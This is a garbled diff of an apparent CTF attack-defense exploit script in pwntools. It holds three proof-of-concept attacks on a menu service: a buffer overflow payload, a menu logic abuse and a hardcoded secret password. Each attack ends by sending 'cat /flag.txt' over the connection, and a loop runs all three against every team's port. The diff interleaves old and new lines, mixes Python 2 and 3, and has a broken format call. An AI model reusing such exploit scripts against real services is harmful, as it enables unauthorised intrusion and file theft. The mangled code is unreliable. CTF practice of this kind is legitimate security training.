|
@ -6,99 +6,95 @@ TOTAL_TEAMS = 1 |
|
|
FORMAT = "SlashRootCTF" |
|
|
FORMAT = "SlashRootCTF" |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def run(): |
|
|
|
|
|
# return process(FILENAME) |
|
|
|
|
|
return remote("127.0.0.1", 60204) |
|
|
|
|
|
|
|
|
def poc0(host, port): |
|
|
|
|
|
with remote(host, port) as p: |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
|
|
|
msg = p.recvuntil(">") |
|
|
|
|
|
# print(msg) |
|
|
|
|
|
if "young" in msg: |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("2") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("4") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
for _ in xrange(10): |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("99") |
|
|
|
|
|
p.sendline("cat /flag.txt") |
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
# print flag |
|
|
|
|
|
if FORMAT in flag: |
|
|
|
|
|
return True |
|
|
|
|
|
else: |
|
|
|
|
|
return False |
|
|
|
|
|
else: |
|
|
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def poc0(host, port): |
|
|
|
|
|
p = remote(host, port) |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) |
|
|
|
|
|
msg = p.recvuntil(">") |
|
|
|
|
|
# print(msg) |
|
|
|
|
|
if "young" in msg: |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
|
|
|
def poc1(host, port): |
|
|
|
|
|
with remote(host, port) as p: |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("2") |
|
|
|
|
|
|
|
|
p.sendline("Leo") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
for _ in range(2): |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("3") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("0") |
|
|
|
|
|
if "Who" in p.recvuntil(">"): |
|
|
|
|
|
return False |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("1") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("4") |
|
|
p.sendline("4") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
for _ in xrange(10): |
|
|
|
|
|
|
|
|
for _ in range(10): |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
p.sendline("99") |
|
|
p.sendline("cat /flag.txt") |
|
|
p.sendline("cat /flag.txt") |
|
|
flag = p.recvuntil("}") |
|
|
flag = p.recvuntil("}") |
|
|
# print flag |
|
|
|
|
|
if FORMAT in flag: |
|
|
if FORMAT in flag: |
|
|
return True |
|
|
return True |
|
|
else: |
|
|
else: |
|
|
return False |
|
|
return False |
|
|
else: |
|
|
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def poc1(host, port): |
|
|
|
|
|
p = remote(host, port) |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("Leo") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
for _ in range(2): |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("3") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("0") |
|
|
|
|
|
if "Who" in p.recvuntil(">"): |
|
|
|
|
|
return False |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("1") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("4") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
for _ in range(10): |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("99") |
|
|
|
|
|
p.sendline("cat /flag.txt") |
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
if FORMAT in flag: |
|
|
|
|
|
return True |
|
|
|
|
|
else: |
|
|
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def poc2(host, port): |
|
|
def poc2(host, port): |
|
|
p = remote(host, port) |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("6") |
|
|
|
|
|
if "Lv: 1000000" in p.recvuntil(">"): |
|
|
|
|
|
p.sendline("2") |
|
|
|
|
|
|
|
|
with remote(host, port) as p: |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("4") |
|
|
|
|
|
|
|
|
p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("y") |
|
|
p.sendline("y") |
|
|
for _ in xrange(10): |
|
|
|
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("6") |
|
|
|
|
|
if "Lv: 1000000" in p.recvuntil(">"): |
|
|
|
|
|
p.sendline("2") |
|
|
p.recvuntil(">") |
|
|
p.recvuntil(">") |
|
|
p.sendline("99") |
|
|
|
|
|
p.sendline("cat /flag.txt") |
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
if FORMAT in flag: |
|
|
|
|
|
return True |
|
|
|
|
|
|
|
|
p.sendline("4") |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("y") |
|
|
|
|
|
for _ in xrange(10): |
|
|
|
|
|
p.recvuntil(">") |
|
|
|
|
|
p.sendline("99") |
|
|
|
|
|
p.sendline("cat /flag.txt") |
|
|
|
|
|
flag = p.recvuntil("}") |
|
|
|
|
|
if FORMAT in flag: |
|
|
|
|
|
return True |
|
|
|
|
|
else: |
|
|
|
|
|
return False |
|
|
else: |
|
|
else: |
|
|
return False |
|
|
return False |
|
|
else: |
|
|
|
|
|
return False |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if __name__ == "__main__": |
|
|
if __name__ == "__main__": |
|
|
for i in range(1, TOTAL_TEAMS+1): |
|
|
for i in range(1, TOTAL_TEAMS+1): |
|
|
print poc0(HOST, (60004 + (i*100))) |
|
|
|
|
|
print poc1(HOST, (60004 + (i*100))) |
|
|
|
|
|
print poc2(HOST, (60004 + (i*100))) |
|
|
|
|
|
|
|
|
r0 = poc0(HOST, (60004 + (i*100))) |
|
|
|
|
|
r1 = poc1(HOST, (60004 + (i*100))) |
|
|
|
|
|
r2 = poc2(HOST, (60004 + (i*100))) |
|
|
|
|
|
print("Team [{}] {} {} {}" % (i, r0, r1, r2)) |